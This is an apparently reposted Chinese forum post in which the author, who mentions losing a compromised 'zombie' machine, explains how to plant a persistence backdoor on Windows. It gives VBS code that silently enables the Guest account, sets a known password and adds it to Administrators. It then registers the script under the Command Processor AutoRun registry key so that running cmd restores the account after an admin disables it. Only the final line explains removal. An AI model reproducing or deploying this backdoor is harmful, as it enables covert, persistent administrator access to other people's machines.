留个VBS后门!

来源:互联网 发布:淘宝注册开网店的步骤 编辑:程序博客网 时间:2024/06/08 10:17
哎,我肉鸡又没了,留个什么后门麻烦死了~~~!~!~!所以我挖空心思想到这样一个办法 先新建一个.txt文档 然后加入下面的内容 dim wsh set wsh=CreateObject("WScript.Shell") wsh.run "net user guest /active:yes",0 (激活guest账号) wsh.run "net user guest djhacker",0 (修改GUEST密码为djhacker) wsh.run "net localgroup administrators guest /add",0 (添加GUEST到管理组) 然后把这个.txt文件的扩展名改为 .vbs即可 然后打开注册表修改注册标里面的: HKEY_LOCAL_MACHINE/Software/Microsoft/Command Processor/AutoRun 在键值里面加入你vbs文件的路径就OK,然后运行vbs文件,不死账号出来拉 如果管理员把你动过手脚的guest账号停了,当时他运行cmd的时候又自动启动了guest账号,因为上面的修改已经让我们的vbs文件和cmd.exe 产生了关联运行cmd他就找到注册表里面的路径运行那VBS文件 原理:很简单的原理,其实有基础的朋友看上面的过程就已经知道了原理了~~~ 通过修改注册表和使用vbs文件里面的一些代码让 CMD和你指定路径的vbs文件产生了关联,接着运行CMD直接通过注册标里面的路径运行你的指定的文件,嘎嘎~~~简单吧 这样一个不死的就建立了` 可能有的朋友要产生疑问~为什么不自己建立账号,如果你自己建立的话被管理员发现了就删掉了~~GUEST是删不掉的,系统内置账号,哈哈哈 解决方法:先把你改过的注册表的地方的路径删咯~然后再禁用了guest账号就完事